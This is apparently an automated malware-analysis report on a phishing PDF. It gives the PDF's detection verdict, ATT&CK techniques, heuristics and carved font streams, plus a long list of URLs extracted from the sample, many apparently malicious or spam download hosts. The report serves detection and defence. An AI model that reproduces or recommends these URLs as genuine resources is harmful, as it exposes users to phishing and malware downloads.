MALICIOUS
104
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1566.002 Spearphishing Attachment
The file is a PDF containing embedded JavaScript, which is a common technique for delivering malicious content. The PDF also contains an external URI pointing to a suspicious URL, likely serving as a download source for a secondary payload. ClamAV detection and ML classification further support its malicious nature.
Machine Learning
- Nyx PDF Classifier malicious score 0.8192
Heuristics 5
-
ClamAV: Pdf.Phishing.Trojan-d2568dad23a94d95-d2568dad23a94d95-10044375-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Pdf.Phishing.Trojan-d2568dad23a94d95-d2568dad23a94d95-10044375-0
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
External URI info PDF_URIPDF contains an external URL action
-
Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTALThe same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://lovig.co.za/XSRYdR1H?utm_term=mikrotik+rb2011uias-rm+manual+2+download+2017+2
- https://validujagobun.weebly.com/uploads/1/3/4/5/134526773/6e9d3243f2e38.pdf
- https://kekulepolunan.weebly.com/uploads/1/3/4/8/134889268/rijamezirale-pamufowar-pekefutab.pdf
- https://hattoco.vn/images/ckeditor/files/28716778485.pdf
- https://sisekiki.weebly.com/uploads/1/3/4/6/134622657/tepabuxukobinapit.pdf
- https://pezibusogesa.weebly.com/uploads/1/3/0/7/130739584/7677173.pdf
- https://snabavto.com/wp-content/plugins/formcraft/file-upload/server/content/files/1620f2651109e5---45229560879.pdf
- https://dobukikiwaf.weebly.com/uploads/1/3/5/2/135295041/9137a.pdf
- http://www.ecostroyservis.ru/File/76790318036.pdf
- https://jugosubu.weebly.com/uploads/1/4/1/4/141417626/pojun_vopini_jivodofubitew.pdf
- https://puxipevabama.weebly.com/uploads/1/3/4/3/134308905/4765025.pdf
- http://koronavirus.lenti.hu/feltoltes/files/45072901060.pdf
- https://vovamujif.weebly.com/uploads/1/3/5/3/135318660/3173750.pdf
- https://bifomika.weebly.com/uploads/1/3/1/8/131856700/4094560.pdf
- https://paxolobiwoke.weebly.com/uploads/1/3/1/1/131163878/koxivinavijori.pdf
- https://rugexosijebup.weebly.com/uploads/1/3/4/0/134017508/3711741.pdf
- https://tasidajerodal.weebly.com/uploads/1/3/4/7/134757451/nipise.pdf
- https://kuwoloxafi.weebly.com/uploads/1/3/0/8/130873903/sezepul_giwidi_zuzirorepola.pdf
- https://roxejozojone.weebly.com/uploads/1/3/0/9/130969259/927ea067628.pdf
- https://vishalahospitality.com/ckfinder/userfiles/files/juwurupuxosimam.pdf
- https://saxurugilura.weebly.com/uploads/1/3/2/8/132814125/sekigokoluwoxafes.pdf
- https://vexuzunudupugez.weebly.com/uploads/1/3/0/7/130740013/sinaxuwofij.pdf
- https://www.vek-bg.com/app/templates/js/ckfinder/userfiles/files/forax.pdf
- https://jizoneva.weebly.com/uploads/1/3/0/7/130738725/gawatolovotuzoxovugi.pdf
- http://www.iso-clean.fr/wp-content/plugins/formcraft/file-upload/server/content/files/1628ae969e58a8---16119915992.pdf
- https://vesizolakaz.weebly.com/uploads/1/3/4/3/134333528/futarepatelij.pdf
- https://diwizimop.weebly.com/uploads/1/3/4/3/134314139/8742770.pdf
- https://nonekuvifuno.weebly.com/uploads/1/3/4/4/134478383/wavozazegax-fajukazewalakuf-sanidivuwaveli-nexeto.pdf
- https://zupelewelasilag.weebly.com/uploads/1/3/4/5/134594614/wiboxusuro-gefupedamivax-voxizefa.pdf
- http://jojo.net/data/jojo.net/uploadfiles/file/sururetepatopi.pdf
- https://voicelux.ru/wp-content/plugins/super-forms/uploads/php/files/8378c45b27aac728b5d4580348d227c5/panexogup.pdf
- http://gemeinschaftshaus-grossmuss.de/demo/admin/editor/kcfinder/upload/files/54812843510.pdf
- https://ruzejeparofilag.weebly.com/uploads/1/3/4/5/134582671/48ca54de10d5.pdf
- https://tibalazilidogu.weebly.com/uploads/1/4/1/2/141257669/6889b8408551.pdf
- https://farukipem.weebly.com/uploads/1/3/4/4/134473356/c0ee6082e.pdf
- https://nuxafinumi.weebly.com/uploads/1/4/1/4/141466153/9320682.pdf
- https://fusidefedarej.weebly.com/uploads/1/3/4/8/134857834/02690a42eef4da.pdf
- http://wignaccent.com/FCKeditor_2.6.3/userimages/file/20220423201340.pdf
- https://xozavefo.weebly.com/uploads/1/3/4/0/134018900/8548241.pdf
- https://stradatextiles.com/upload/ckfinder/files/92282746816.pdf
- https://gojemafofapuvog.weebly.com/uploads/1/3/2/6/132681271/togijugonurimo.pdf
- http://mpapir.ekopapir.com/images/files/difixulufeditan.pdf
- https://tusujowifavenag.weebly.com/uploads/1/3/1/4/131453847/2022415.pdf
- http://www.w3.org/1999/02/22-rdf-syntax-ns#
- http://purl.org/dc/elements/1.1/
- http://ns.adobe.com/pdf/1.3/
- http://ns.adobe.com/xap/1.0/
- http://ns.adobe.com/xap/1.0/mm/
- http://ns.adobe.com/xap/1.0/rights/
- http://dejavu.sourceforge.net
+1 more URL(s)
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
font_00_sfnt_off00020f2e.bin9d2294e344127da9ddc2b77d68b1576b6b78373885bc9da2859f180a98f2c1e1 |
pdf-font-stream | PDF embedded font (sfnt) at offset 0x20F2E | 16792 bytes |
font_01_sfnt_off00022745.bin8e79b0921f9443137af0182b3b1c458e5ec166313d7b97f84d108d0ce598f514 |
pdf-font-stream | PDF embedded font (sfnt) at offset 0x22745 | 11068 bytes |
font_02_sfnt_off0002413e.bin46fad183022e1bed88923009bf9c2ffe5a259398478a5a4004428338cafeb588 |
pdf-font-stream | PDF embedded font (sfnt) at offset 0x2413E | 19184 bytes |
Open this report in the interactive analyzer, or submit your own file for analysis.